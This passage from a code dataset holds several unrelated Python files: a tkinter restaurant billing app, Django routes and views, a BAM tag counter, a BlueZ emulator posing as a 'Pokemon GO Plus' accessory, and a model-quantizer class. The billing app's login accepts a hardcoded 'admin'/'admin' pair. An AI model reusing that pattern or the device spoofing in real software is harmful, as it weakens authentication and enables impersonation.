Service_Charge.set(Service)\r\n Cost.set(CostofMeal)\r\n Tax.set(PaidTax)\r\n SubTotal.set(CostofMeal)\r\n Total.set(OverAllCost)\r\n win1_bk.updateB(1,Idly.get(),Dosa.get(),Kesari.get(),Drinks.get(),Pulav.get())\r\n \r\ndef Reset():\r\n rand.set(\"\") \r\n Idly.set(\"\")\r\n Dosa.set(\"\")\r\n Kesari.set(\"\")\r\n SubTotal.set(\"\")\r\n Total.set(\"\")\r\n Service_Charge.set(\"\")\r\n Drinks.set(\"\")\r\n Tax.set(\"\")\r\n Cost.set(\"\")\r\n Pulav.set(\"\")\r\n \r\n\r\n\r\ndef Bill():\r\n for widget in s1.winfo_children():\r\n widget.destroy()\r\n \r\n \r\n lblReference= Label(s1, font=('arial', 16, 'bold'),text=\"Reference\",bd=16,anchor=\"w\")\r\n lblReference.grid(row=0, column=0)\r\n \r\n txtReference=Entry(s1, font=('arial',16,'bold'),textvariable=rand,bd=10,insertwidth=4,bg=\"powder blue\",justify='right')\r\n txtReference.grid(row=0,column=1)\r\n\r\n lblIdly= Label(s1, font=('arial', 16, 'bold'),text=\"Idly\",bd=16,anchor=\"w\")\r\n lblIdly.grid(row=1, column=0)\r\n txtIdly=Entry(s1, font=('arial',16,'bold'),textvariable=Idly,bd=10,insertwidth=4,bg=\"powder blue\",justify='right')\r\n txtIdly.grid(row=1,column=1)\r\n\r\n\r\n lblDosa= Label(s1, font=('arial', 16, 'bold'),text=\"Dosa\",bd=16,anchor=\"w\")\r\n lblDosa.grid(row=2, column=0)\r\n txtDosa=Entry(s1, font=('arial',16,'bold'),textvariable=Dosa,bd=10,insertwidth=4,bg=\"powder blue\",justify='right')\r\n txtDosa.grid(row=2,column=1)\r\n\r\n\r\n lblKesari= Label(s1, font=('arial', 16, 'bold'),text=\"Kesari bath\",bd=16,anchor=\"w\")\r\n lblKesari.grid(row=3, column=0)\r\n txtKesari=Entry(s1, font=('arial',16,'bold'),textvariable=Kesari,bd=10,insertwidth=4,bg=\"powder blue\",justify='right')\r\n txtKesari.grid(row=3,column=1)\r\n\r\n lblPulav= Label(s1, font=('arial', 16, 
'bold'),text=\"Pulav\",bd=16,anchor=\"w\")\r\n lblPulav.grid(row=4, column=0)\r\n txtPulav=Entry(s1, font=('arial',16,'bold'),textvariable=Pulav,bd=10,insertwidth=4,bg=\"powder blue\",justify='right')\r\n txtPulav.grid(row=4,column=1)\r\n\r\n \r\n lblDrinks= Label(s1, font=('arial', 16, 'bold'),text=\"Drinks\",bd=16,anchor=\"w\")\r\n lblDrinks.grid(row=0, column=2)\r\n txtDrinks=Entry(s1, font=('arial',16,'bold'),textvariable=Drinks,bd=10,insertwidth=4,bg=\"powder blue\",justify='right')\r\n txtDrinks.grid(row=0,column=3)\r\n\r\n lblCost= Label(s1, font=('arial', 16, 'bold'),text=\"Cost of Meal\",bd=16,anchor=\"w\")\r\n lblCost.grid(row=1, column=2)\r\n txtCost=Entry(s1, font=('arial',16,'bold'),textvariable=Cost,bd=10,insertwidth=4,bg=\"powder blue\",justify='right')\r\n txtCost.grid(row=1,column=3)\r\n\r\n\r\n lblService= Label(s1, font=('arial', 16, 'bold'),text=\"Service Charge\",bd=16,anchor=\"w\")\r\n lblService.grid(row=2, column=2)\r\n txtService=Entry(s1, font=('arial',16,'bold'),textvariable=Service_Charge,bd=10,insertwidth=4,bg=\"powder blue\",justify='right')\r\n txtService.grid(row=2,column=3)\r\n\r\n\r\n lblStateTax= Label(s1, font=('arial', 16, 'bold'),text=\"State Tax\",bd=16,anchor=\"w\")\r\n lblStateTax.grid(row=3, column=2)\r\n txtStateTax=Entry(s1, font=('arial',16,'bold'),textvariable=Tax,bd=10,insertwidth=4,bg=\"powder blue\",justify='right')\r\n txtStateTax.grid(row=3,column=3)\r\n\r\n lblSubTotal= Label(s1, font=('arial', 16, 'bold'),text=\"Sub Total\",bd=16,anchor=\"w\")\r\n lblSubTotal.grid(row=4, column=2)\r\n txtSubTotal=Entry(s1, font=('arial',16,'bold'),textvariable=SubTotal,bd=10,insertwidth=4,bg=\"powder blue\",justify='right')\r\n txtSubTotal.grid(row=4,column=3)\r\n\r\n lblTotalCost= Label(s1, font=('arial', 16, 'bold'),text=\"Total Cost\",bd=16,anchor=\"w\")\r\n lblTotalCost.grid(row=5, column=2)\r\n txtTotalCost=Entry(s1, font=('arial',16,'bold'),textvariable=Total,bd=10,insertwidth=4,bg=\"powder blue\",justify='right')\r\n txtTotalCost.grid(row=5,column=3)\r\n Reset()\r\n\r\n #==========================================Buttons==========================================================================================\r\n btnTotal=Button(s1,padx=16,pady=8,bd=16,fg=\"black\",font=('arial',16,'bold'),width=10,text=\"Total\",bg=\"powder blue\",command=lambda:Ref()).grid(row=7,column=1)\r\n\r\n btnReset=Button(s1,padx=16,pady=8,bd=16,fg=\"black\",font=('arial',16,'bold'),width=10,text=\"Reset\",bg=\"powder blue\",command=lambda:Reset()).grid(row=7,column=2)\r\n\r\n btnExit=Button(s1,padx=16,pady=8,bd=16,fg=\"black\",font=('arial',16,'bold'),width=10,text=\"Home\",bg=\"powder blue\",command=lambda:call_sys()).grid(row=7,column=3)\r\n\r\n \r\ndef call_sys():\r\n for widget in s1.winfo_children():\r\n widget.destroy()\r\n #lab3= Label(s1, font=('arial',20,'bold'),text=\"Restaurant Billing\" , fg= \"Blue\", bd=10,anchor='w')\r\n #lab3.grid(row=0,column=1)\r\n b1=Button(s1,padx=20,pady=10,bd=2,font=('arial',20),text=\"Inventory\", bg=\"powder blue\", command=lambda:Invent()).grid(row=0,column=1)\r\n b2=Button(s1,padx=20,pady=10,bd=2,font=('arial',20),text=\"Generate Bill\", bg=\"powder blue\", command=lambda:Bill()).grid(row=1,column=1)\r\n b3=Button(s1,padx=20,pady=10,bd=2,font=('arial',20),text=\"Exit Project\", bg=\"powder blue\", command=lambda:root.destroy()).grid(row=2,column=1)\r\n\r\n\r\ndef btnClick():\r\n \r\n if text1.get()=='admin' and text2.get()=='admin':\r\n show_admin()\r\n else:\r\n rows = win1_bk.search(text1.get(),text2.get())\r\n if not rows:\r\n 
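# login failed: the query returned no row for this ID/password pair\r\n            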
messagebox.showinfo(' wrong','try again')\r\n        else:\r\n            if text1.get()== rows[0][1] and text2.get()== rows[0][2]:\r\n                #root.destroy()    \r\n                call_sys()\r\n        \r\n   \r\nbtn1=Button(s1,padx=1,pady=10,bd=1,font=('arial',20),text=\"submit\", bg=\"powder blue\", command=lambda:btnClick()).grid(row=3,column=1)\r\n\r\nroot.mainloop()\r\n","sub_path":"win2.py","file_name":"win2.py","file_ext":"py","file_size_in_byte":16276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"333927517","text":"from django.urls import path, include\nfrom . import views\n\n\napp_name = 'monthly_goal'\nurlpatterns = [\n    path('', include('account.urls')),\n    path(\n        'goal/new/',\n        views.MonthlyGoalCreateView.as_view(template_name='monthly_goal/goal_create.html'),\n        name='goal-create'\n    ),\n    path(\n        'goal/<int:pk>/', views.MonthlyGoalDetailView.as_view(\n            template_name='monthly_goal/goal_detail.html'), name='goal-detail'\n    ),\n    path(\n        'goal/<int:pk>/update', views.MonthlyGoalUpdateView.as_view(\n            template_name='monthly_goal/goal_update.html'),\n        name='goal-update'\n    ),\n    path(\n        'goal/<int:pk>/delete', views.MonthlyGoalDeleteView.as_view(\n            template_name='monthly_goal/goal_delete.html'),\n        name='goal-delete'\n    ),\n]\n","sub_path":"self_management/monthly_goal/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"233522365","text":"#! /usr/bin/env python2\n\ndef main():\n\n    #\n    # Imports & globals\n    #\n    global args, summaryInstance, sys, time, pysam, infile\n    import pysam, sys, time\n\n    #\n    # Argument parsing\n    #\n    argumentsInstance = readArgs()\n\n    #\n    # Initials\n    #\n    barcode_dict = dict()\n    read_counter = 0\n    read_counter_currently = 0\n    reads_without_RG = 0\n\n    infile = pysam.AlignmentFile(args.bam_file, 'rb')\n    report_progress('Infile opened, starting analysis')\n    for read in infile.fetch(until_eof=True):\n\n        # Skips read if no barcode tag is present\n        try: barcode_ID = read.get_tag(args.tag)\n        except KeyError:\n            reads_without_RG += 1\n            continue\n\n        try: barcode_dict[barcode_ID] += 1\n        except KeyError:\n            barcode_dict[barcode_ID] = 1\n\n        read_counter += 1\n        read_counter_currently += 1\n        if read_counter_currently == 1000000:\n            read_counter_currently = 0\n            report_progress(\"{:,}\".format(read_counter) + ' reads processed')\n\n    barcode_clusters = 0\n    good_barcode_clusters = 0\n    phased_clusters = 0\n    at_least_read_pair = 0\n    for barcode, number_of in barcode_dict.items():\n\n        barcode_clusters += 1\n        if number_of >= 8: good_barcode_clusters += 1\n        if number_of >= 2: at_least_read_pair += 1\n        if number_of >= 4: phased_clusters += 1\n\n    print('\\nANALYSIS FINISHED')\n    print('\\nNUMBER OF READ GROUPS FOUND: ' + str(barcode_clusters))\n    print('WITH 2 OR MORE READS: ' + str(at_least_read_pair))\n    print('WITH 4 OR MORE READS: ' + str(phased_clusters))\n    print('WITH 8 OR MORE READS: ' + str(good_barcode_clusters))\n    print('\\nREAD PAIRS WITHOUT RG TAG: ' + str((reads_without_RG/2)))\n\n    infile.close()\n\ndef report_progress(string):\n    \"\"\"\n    Writes a time stamp followed by a message (=string) to standard error.\n    Input: String\n    Output: [date] string\n    \"\"\"\n    sys.stderr.write(time.strftime(\"%a, %d %b %Y %H:%M:%S\", time.localtime()) + '\\t' + string + '\\n')\n\nclass readArgs(object):\n    \"\"\"\n    Reads arguments and handles basic error handling like python version control etc.\n    \"\"\"\n\n    def __init__(self):\n\n        readArgs.parse(self)\n        readArgs.pythonVersion(self)\n\n    def 
parse(self):\n\n #\n # Imports & globals\n #\n import argparse, multiprocessing\n global args\n\n parser = argparse.ArgumentParser(description=__doc__)\n\n # Arguments\n parser.add_argument(\"bam_file\", help=\".bam file tagged with @RG tags).\")\n\n # Options\n parser.add_argument(\"-F\", \"--force_run\", action=\"store_true\", help=\"Run analysis even if not running python 3. \"\n \"Not recommended due to different function \"\n \"names in python 2 and 3.\")\n parser.add_argument(\"-t\", \"--tag\", type=str, default='RG', help=\"Tag in which barcode is stored. DEFAULT: RG\")\n\n args = parser.parse_args()\n\n def pythonVersion(self):\n \"\"\" Makes sure the user is running python 3.\"\"\"\n\n #\n # Version control\n #\n import sys\n if sys.version_info.major == 3:\n pass\n else:\n sys.stderr.write('\\nWARNING: you are running python ' + str(\n sys.version_info.major) + ', this script is written for python 3.')\n if not args.force_run:\n sys.stderr.write('\\nAborting analysis. Use -F (--Force) to run anyway.\\n')\n sys.exit()\n else:\n sys.stderr.write('\\nForcing run. This might yield inaccurate results.\\n')\n\nif __name__==\"__main__\": main()","sub_path":"archive/count_RG_in_bam.py","file_name":"count_RG_in_bam.py","file_ext":"py","file_size_in_byte":3733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"493870206","text":"#!/usr/bin/python3\n\nimport dbus.mainloop.glib\nfrom bluez_components import *\nfrom datetime import datetime\n\nnow = datetime.now()\n\ntry:\n from gi.repository import GObject\nexcept ImportError:\n import gobject as GObject\n\nUUID_DEVICE_CONTROL_SERVICE = \"21c50462-67cb-63a3-5c4c-82b5b9939aeb\"\nUUID_LED_VIBRATE_CTRL_CHAR = \"21c50462-67cb-63a3-5c4c-82b5b9939aec\"\nUUID_BUTTON_NOTIF_CHAR = \"21c50462-67cb-63a3-5c4c-82b5b9939aed\"\nUUID_UNKNOWN_CHAR = \"21c50462-67cb-63a3-5c4c-82b5b9939aee\"\nUUID_FW_UPDATE_REQUEST_CHAR = \"21c50462-67cb-63a3-5c4c-82b5b9939aef\"\nUUID_FW_VERSION_CHAR = \"21c50462-67cb-63a3-5c4c-82b5b9939af0\"\nUUID_CERTIFICATE_SERVICE = \"bbe87709-5b89-4433-ab7f-8b8eef0d8e37\"\nUUID_CENTRAL_TO_SFIDA_CHAR = \"bbe87709-5b89-4433-ab7f-8b8eef0d8e38\"\nUUID_SFIDA_COMMANDS_CHAR = \"bbe87709-5b89-4433-ab7f-8b8eef0d8e39\"\nUUID_SFIDA_TO_CENTRAL_CHAR = \"bbe87709-5b89-4433-ab7f-8b8eef0d8e3a\"\nUUID_BATTERY_SERVICE = \"180f\"\nUUID_BATTERY_LEVEL_CHAR = \"2A19\"\nUUID_CLIENT_CHARACTERISTIC_CONFIG = \"2902\"\n\nmainloop = None\n\n\nclass fw_update_request_chrc(Characteristic):\n def __init__(self, bus, index, service):\n self.UUID = UUID_FW_UPDATE_REQUEST_CHAR\n Characteristic.__init__(\n self, bus, index,\n self.UUID,\n ['write'],\n service)\n self.value = 0\n\n def WriteValue(self, value, options):\n self.value = value\n log(self.UUID)\n\n\nclass fw_version_chrc(Characteristic):\n def __init__(self, bus, index, service):\n self.UUID = UUID_FW_VERSION_CHAR\n\n Characteristic.__init__(\n self, bus, index,\n self.UUID,\n ['read'],\n service)\n self.value = 0\n\n def ReadValue(self, options):\n log(self.UUID)\n return [dbus.Byte(self.value)]\n\n\nclass led_vibrate_chrc(Characteristic):\n def __init__(self, bus, index, service):\n self.UUID = UUID_LED_VIBRATE_CTRL_CHAR\n\n Characteristic.__init__(\n self, bus, index,\n self.UUID,\n ['write'],\n service)\n self.value = 0\n\n def WriteValue(self, value, options):\n self.value = value\n log(self.UUID)\n\n\nclass button_notif_chrc(Characteristic):\n def __init__(self, bus, index, service):\n self.UUID = UUID_BUTTON_NOTIF_CHAR\n\n Characteristic.__init__(\n 
self, bus, index,\n            self.UUID,\n            ['notify'],\n            service)\n        self.value = 0\n        self.notifying = False\n\n    def StartNotify(self):\n        if self.notifying:\n            log('Already notifying, nothing to do')\n            return\n\n        self.notifying = True\n        log(self.UUID)\n\n    def StopNotify(self):\n        if not self.notifying:\n            log('Not notifying, nothing to do')\n            return\n\n        self.notifying = False\n        log(self.UUID)\n\n\nclass unknown_chrc(Characteristic):\n    def __init__(self, bus, index, service):\n        self.UUID = UUID_UNKNOWN_CHAR\n\n        Characteristic.__init__(\n            self, bus, index,\n            self.UUID,\n            ['write'],\n            service)\n        self.value = 0\n\n    def WriteValue(self, value, options):\n        self.value = value\n        log(self.UUID)\n\n\nclass sfida_commands_chrc(Characteristic):\n    def __init__(self, bus, index, service):\n        self.UUID = UUID_SFIDA_COMMANDS_CHAR\n        self.tag = \"Commands\"\n\n        Characteristic.__init__(\n            self, bus, index,\n            self.UUID,\n            ['notify'],\n            service)\n        self.value = 0\n        self.notifying = False\n\n    def StartNotify(self):\n        if self.notifying:\n            log('Already notifying, nothing to do', self.tag)\n            return\n\n        self.notifying = True\n        # GObject.timeout_add(1000, self.StopNotify)\n        log(\"start \" + str(self.uuid), self.tag)\n\n    def StopNotify(self):\n        if not self.notifying:\n            log('Not notifying, nothing to do', self.tag)\n            return\n\n        self.notifying = False\n        log(\"stop \" + self.UUID, self.tag)\n\n\nclass sfida_to_central_chrc(Characteristic):\n    def __init__(self, bus, index, service):\n        self.UUID = UUID_SFIDA_TO_CENTRAL_CHAR\n        self.tag = \"STC\"\n\n        Characteristic.__init__(\n            self, bus, index,\n            self.UUID,\n            ['read'],\n            service)\n        self.value = [3, 0, 0, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16]\n        for num, val in enumerate(self.value):\n            self.value[num] = dbus.Byte(val)\n\n    def ReadValue(self, options):\n        log(self.UUID + \" \" + str(self.value), self.tag)\n        # self.value is already a list of dbus.Byte, so return it directly\n        return self.value\n\n\nclass central_to_sfida_chrc(Characteristic):\n    def __init__(self, bus, index, service):\n        self.UUID = UUID_CENTRAL_TO_SFIDA_CHAR\n        self.tag = \"CTS\"\n\n        Characteristic.__init__(\n            self, bus, index,\n            self.UUID,\n            ['write'],\n            service)\n        self.value = 3\n\n    def WriteValue(self, value, options):\n        log(self.UUID + \" \" + str(value) + \" \" + str(options), self.tag)\n        self.value = value\n\n\nclass battery_level_chrc(Characteristic):\n    def __init__(self, bus, index, service):\n        self.UUID = UUID_BATTERY_LEVEL_CHAR\n\n        Characteristic.__init__(\n            self, bus, index,\n            self.UUID,\n            ['notify', 'read'],\n            service)\n        self.value = 80\n        self.notifying = False\n\n    def ReadValue(self, options):\n        log('Battery Level Read: ' + repr(self.value))\n        log(self.UUID)\n        return [dbus.Byte(self.value)]\n\n    def StartNotify(self):\n        if self.notifying:\n            log('Already notifying, nothing to do')\n            return\n\n        self.notifying = True\n        log(self.UUID)\n\n    def StopNotify(self):\n        if not self.notifying:\n            log('Not notifying, nothing to do')\n            return\n\n        self.notifying = False\n        log(self.UUID)\n\n\nclass device_control_service(Service):\n    \"\"\" Fake Device Control Update Service.\"\"\"\n\n    def __init__(self, bus, index):\n        UUID = UUID_DEVICE_CONTROL_SERVICE\n        Service.__init__(self, bus, index, UUID, True)\n        self.add_characteristic(led_vibrate_chrc(bus, 0, self))\n        self.add_characteristic(button_notif_chrc(bus, 1, self))\n        self.add_characteristic(unknown_chrc(bus, 2, self))\n        self.add_characteristic(fw_update_request_chrc(bus, 3, self))\n        self.add_characteristic(fw_version_chrc(bus, 4, self))\n\n\nclass certificate_service(Service):\n    \"\"\" Certificate Service.\"\"\"\n\n    
def __init__(self, bus, index):\n UUID = UUID_CERTIFICATE_SERVICE\n Service.__init__(self, bus, index, UUID, True)\n self.add_characteristic(sfida_commands_chrc(bus, 0, self))\n self.add_characteristic(central_to_sfida_chrc(bus, 1, self))\n self.add_characteristic(sfida_to_central_chrc(bus, 2, self))\n\n\nclass battery_service(Service):\n \"\"\" Fake Battery Service.\"\"\"\n\n def __init__(self, bus, index):\n UUID = UUID_BATTERY_SERVICE\n Service.__init__(self, bus, index, UUID, True)\n self.add_characteristic(battery_level_chrc(bus, 0, self))\n\n\nclass po_go_plus_app(Application):\n def __init__(self, bus):\n Application.__init__(self, bus)\n self.add_service(battery_service(bus, 0))\n self.add_service(device_control_service(bus, 1))\n self.add_service(certificate_service(bus, 2))\n\n\nclass po_go_plus_advertisement(Advertisement):\n def __init__(self, bus, index):\n Advertisement.__init__(self, bus, index, 'peripheral')\n self.add_service_data(\"21c50462\", [0x00])\n self.include_tx_power = True\n\n\ndef log(message, tag=\"INFO\"):\n print(now.strftime(\"%Y-%m-%d %H:%M:%S\") + \":[\" + tag + \"] \" + message)\n\n\ndef main():\n global mainloop\n\n dbus.mainloop.glib.DBusGMainLoop(set_as_default=True)\n\n bus = dbus.SystemBus()\n\n # Get ServiceManager and AdvertisingManager\n gatt_properties = [\n {\"Name\": \"Discoverable\", \"Set\": True, \"Value\": False},\n ]\n\n service_manager = get_service_manager(bus, gatt_properties)\n\n ad_properties = [\n {\"Name\": \"Discoverable\", \"Set\": True, \"Value\": True},\n {\"Name\": \"DiscoverableTimeout\", \"Set\": True, \"Value\": 0},\n {\"Name\": \"Class\", \"Set\": False},\n {\"Name\": \"Address\", \"Set\": False},\n {\"Name\": \"Name\", \"Set\": False},\n {\"Name\": \"Alias\", \"Set\": True, \"Value\": \"Pokemon GO Plus\"},\n {\"Name\": \"UUIDs\", \"Set\": False},\n {\"Name\": \"Modalias\", \"Set\": False},\n ]\n\n ad_manager = get_advertisement_manager(bus, ad_properties)\n\n # Create gatt services\n app = po_go_plus_app(bus)\n\n # Create advertisement\n po_go_plus_ad = po_go_plus_advertisement(bus, 0)\n\n mainloop = GObject.MainLoop()\n\n # Register gatt services\n service_manager.RegisterApplication(app.get_path(), {},\n reply_handler=register_app_cb,\n error_handler=register_app_error_cb)\n\n # Register advertisement\n ad_manager.RegisterAdvertisement(po_go_plus_ad.get_path(), {},\n reply_handler=register_ad_cb,\n error_handler=register_ad_error_cb)\n\n log(\"PokeBrm Started\")\n try:\n mainloop.run()\n except KeyboardInterrupt:\n service_manager.UnregisterApplication(app.get_path())\n ad_manager.UnregisterAdvertisement(po_go_plus_ad.get_path())\n print('exit')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"pokebrm_bluez.py","file_name":"pokebrm_bluez.py","file_ext":"py","file_size_in_byte":9534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"93091908","text":"from django.core.mail import send_mail, BadHeaderError\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render, redirect\nfrom django.db.models import Count, Sum\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth import views as auth_views\nfrom .forms import UserSignupForm, ContactForm, UserUpdateForm, AccountUpdateForm\nfrom .models import Cart\nfrom store.models import Product\n\ndef signup(request):\n if request.method == 'POST':\n form = 
UserSignupForm(request.POST)\n        if form.is_valid():\n            form.save()\n            messages.success(request, f\"Account created successfully!!\")\n            return redirect('login')\n    else:\n        form = UserSignupForm()\n    return render(request, 'users/signup.html', { 'title': 'Sign Up', 'form': form })\n\ndef login(request):\n    if request.user.is_authenticated:\n        return redirect('store-home')\n    else:\n        return auth_views.LoginView.as_view(template_name='users/login.html')(request)\n\ndef logout(request):\n    if request.user.is_authenticated:\n        return auth_views.LogoutView.as_view(template_name='users/logout.html')(request)\n    else:\n        return redirect('store-home')\n\ndef contact_us(request):\n    if request.method == 'GET':\n        form = ContactForm()\n    else:\n        form = ContactForm(request.POST)\n        if form.is_valid():\n            if request.user.is_authenticated:\n                subject = form.cleaned_data['subject']\n                from_email = request.user.email\n                message = form.cleaned_data['message']\n                message = \"From: \" + from_email + \"\\n\" + message\n                try:\n                    send_mail(subject, message, from_email, ['']) # fill the list with your email id\n                except BadHeaderError:\n                    messages.error(request, f\"Couldn't send message. Invalid header found.\")\n                    return render(request, \"users/contact-us.html\", { 'title': 'Contact Us', 'form': form })\n                return redirect('contact_success')\n    return render(request, \"users/contact-us.html\", { 'title': 'Contact Us', 'form': form })\n\ndef contact_success(request):\n    return render(request, 'users/contact-success.html', { 'title': 'Message Sent Successfully' })\n\n@login_required\ndef account(request):\n    if request.method == 'POST':\n        u_form = UserUpdateForm(request.POST, instance=request.user)\n        a_form = AccountUpdateForm(request.POST, instance=request.user.account)\n        if u_form.is_valid() and a_form.is_valid():\n            u_form.save()\n            a_form.save()\n            messages.success(request, f\"Account updated successfully!!\")\n            return redirect('my-account')\n    else:\n        u_form = UserUpdateForm(instance=request.user)\n        a_form = AccountUpdateForm(instance=request.user.account)\n    return render(request, 'users/my-account.html', { 'title': 'My Account', 'u_form': u_form, 'a_form': a_form })\n\n@login_required\ndef cart(request):\n    cart_count = Cart.objects.filter(cart_id=request.user).count()\n    if cart_count == 0:\n        return render(request, 'users/my-cart.html', { 'title': 'My Cart', 'cart_count': cart_count })\n    else:\n        cart = Cart.objects.filter(cart_id=request.user)\n        cart_products = cart.values('product_id').annotate(pcount=Count('product_id'))\n        cart_price = cart.aggregate(Sum('product_price'))\n        if request.method == \"GET\":\n            product_id = request.GET.get('add')\n            if product_id != None:\n                cart = Cart.objects.filter(cart_id=request.user)\n                cart.filter(product_id=product_id).delete()\n                return redirect('my-cart')\n        return render(request, 'users/my-cart.html', { 'title': 'My Cart', 'cart_count': cart_count, 'cart_products': cart_products, 'products': Product.objects.all(), 'cart_price': cart_price['product_price__sum'] })\n","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"424371265","text":"# Copyright 2019 ZTE corporation. 
All Rights Reserved.\n# SPDX-License-Identifier: Apache-2.0\n\n\"\"\"\nModel quantizer base class\n\"\"\"\nimport os\nimport shutil\nimport uuid\nfrom abc import abstractmethod\nfrom .compressor import compress_dir\nfrom .message import fail, success\nfrom ..log_util import get_logger\n_LOGGER = get_logger(__name__)\n\n\nclass BaseQuantizer:\n \"\"\"\n Quantizer base class\n \"\"\"\n _COMMON_PARAMS = [\n \"input_model\",\n \"model_name\",\n \"export_path\",\n \"version\"\n ]\n _COMMON_REQUIRED = [\n \"input_model\",\n \"model_name\",\n \"export_path\"\n ]\n\n def __init__(self, config):\n for item in self._COMMON_PARAMS:\n if config.get_attribute(item) is None and item in self._COMMON_REQUIRED:\n _LOGGER.error('Require \"%s\" but not found', item)\n raise Exception('Require \"%s\" but not found' % item)\n self.__setattr__(item, config.get_attribute(item))\n self.model_dir = self._make_model_dir()\n self.version, self.version_dir = self._get_version_dir()\n self.target_dir = self._make_target_dir()\n self.custom_object = None\n _LOGGER.info('Output dir is: %s, version: %s', self.model_dir, self.version)\n\n def quantize(self):\n \"\"\"\n Quantize model\n :return: Return quantize result\n \"\"\"\n try:\n self._do_quantize()\n os.rename(self.target_dir, self.version_dir)\n zip_path = self._compress([self.version_dir])\n return success(zip_path)\n except Exception as error: # pylint:disable=broad-except\n _LOGGER.error('Quantize model failed, error: %s', error)\n _LOGGER.exception(error)\n self._cleanup()\n return fail(str(error))\n\n def _compress(self, source_list):\n \"\"\"\n Compress model to .zip\n :return:\n \"\"\"\n # self.target_dir -> modelName_version.zip\n zip_file_path = os.path.join(self.export_path, self.model_name + '_' + str(self.version) + '.zip')\n return compress_dir(source_list, zip_file_path)\n\n def _make_model_dir(self):\n \"\"\"\n Make model dir, the structure of export dir is:\n export_dir\n |--model_name\n |-- version_1(version_dir)\n | |-- tftrt SavedModel or tflite model\n |-- version_2\n |-- tftrt SavedModel or tflite model\n :return:\n \"\"\"\n _LOGGER.info('make_model_dir: export base path: %s', self.export_path)\n if not os.path.exists(self.export_path):\n os.makedirs(self.export_path, exist_ok=True)\n model_dir = os.path.join(self.export_path, self.model_name)\n os.makedirs(model_dir, exist_ok=True)\n return model_dir\n\n def _get_version_dir(self):\n version = getattr(self, \"version\", None)\n if version is None:\n version = self._get_model_default_version()\n version = str(version)\n version_dir = os.path.join(self.model_dir, version)\n _LOGGER.info(\"Export model version : %s, dir: %s\", version, version_dir)\n if os.path.exists(version_dir):\n raise Exception('Output version is already exist: {}'.format(version_dir))\n return version, version_dir\n\n def _get_model_default_version(self):\n sub_dirs = [int(child) for child in os.listdir(self.model_dir)\n if os.path.isdir(os.path.join(self.model_dir, child)) and child.isdigit()]\n sub_dirs.sort()\n version = str(sub_dirs[-1] + 1) if sub_dirs else \"1\"\n return version\n\n def _make_target_dir(self):\n temp_dir_name = str(uuid.uuid3(uuid.NAMESPACE_URL, '_'.join([self.model_name, self.version])))\n _LOGGER.info(\"temporary export dir: %s, %s\", temp_dir_name, os.path.join(self.model_dir, temp_dir_name))\n target_dir = os.path.join(self.model_dir, temp_dir_name)\n if not os.path.exists(target_dir):\n os.makedirs(target_dir, exist_ok=True)\n return target_dir\n\n def _cleanup(self):\n if 
os.path.exists(self.target_dir):\n            shutil.rmtree(self.target_dir)\n        if os.path.exists(self.version_dir):\n            shutil.rmtree(self.version_dir)\n\n    @abstractmethod\n    def _do_quantize(self):\n        pass\n","sub_path":"src/model_optimizer/quantizer/quantizer_base.py","file_name":"quantizer_base.py","file_ext":"py","file_size_in_byte":4299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"29316945","text":"#!/usr/bin/env python\n# encoding: utf-8\n\ndef build(bld):\n    pinte_target = 'Pinte'\n    pinte_features = ['c', 'cprogram']\n    pinte_uselibs = ['GTK3', 'GTKGLEXT3', 'GIO2']\n    pinte_headers = ['pinte.h', 'pinte-app.h', 'pinte-window.h', 'pinte-project.h',\n                     'pinte-surface.h', 'pinte-utils.h']\n    pinte_source = ['pinte.c', 'pinte-app.c', 'pinte-window.c', 'pinte-project.c',\n                    'pinte-surface.c', 'pinte-utils.c']\n\n    if (bld.options.debug):\n        pinte_uselibs += ['-g', '-Wall']\n\n    pinte = bld(features=pinte_features,\n                headers=pinte_headers,\n                source=pinte_source,\n                target=pinte_target,\n                uselib=pinte_uselibs,\n                includes='.')","sub_path":"src/wscript","file_name":"wscript","file_ext":"","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"13065503","text":"import requests\r\nfrom .cookies import *\r\n\r\n\r\nclass sessionCreFalse(Exception):\r\n    pass\r\n\r\nclass urlNotDefine(Exception):\r\n    pass\r\n\r\nclass urlNoCookies(Exception):\r\n    pass\r\n\r\nclass urlNoHeaders(Exception):\r\n    pass\r\n\r\nclass sessionPost(Exception):\r\n    pass\r\n\r\nclass GetReqError(Exception):\r\n    pass\r\n\r\n\r\nclass session():\r\n    class_cookies=0\r\n    class_headers={}\r\n    class_url1=''\r\n    class_url2=''\r\n    class_session=requests.session()\r\n\r\n    def __init__(self,url='',cookies=0,headers={}):\r\n\r\n        try:\r\n            if url and cookies and headers:\r\n                ret_obj=self.class_session.get(url,cookies=cookies,headers=headers)\r\n            elif url and cookies and not headers:\r\n                ret_obj=self.class_session.get(url,cookies=cookies)\r\n            else:\r\n                ret_obj=0\r\n            if ret_obj!=0:\r\n                if(ret_obj.status_code!=200):\r\n                    raise sessionCreFalse('\\n\\nsession not create successfully\\n\\n')\r\n                self.set_url1(url)\r\n                self.set_cookies(ret_obj.cookies)\r\n                self.set_headers(headers)    \r\n\r\n        except sessionCreFalse as except0:\r\n            print(except0)\r\n            quit()\r\n\r\n    def set_cookies(self,arg_cookies):\r\n        self.class_cookies=cookies.all2jar(arg_cookies)\r\n    def set_headers(self,headers):\r\n        self.class_headers=headers\r\n    def set_url1(self,url):\r\n        self.class_url1=url\r\n    def set_url2(self,url):\r\n        self.class_url2=url\r\n\r\n    def sessionCre(self,url='',cookies=0,headers={}):\r\n        try:\r\n            if url:\r\n                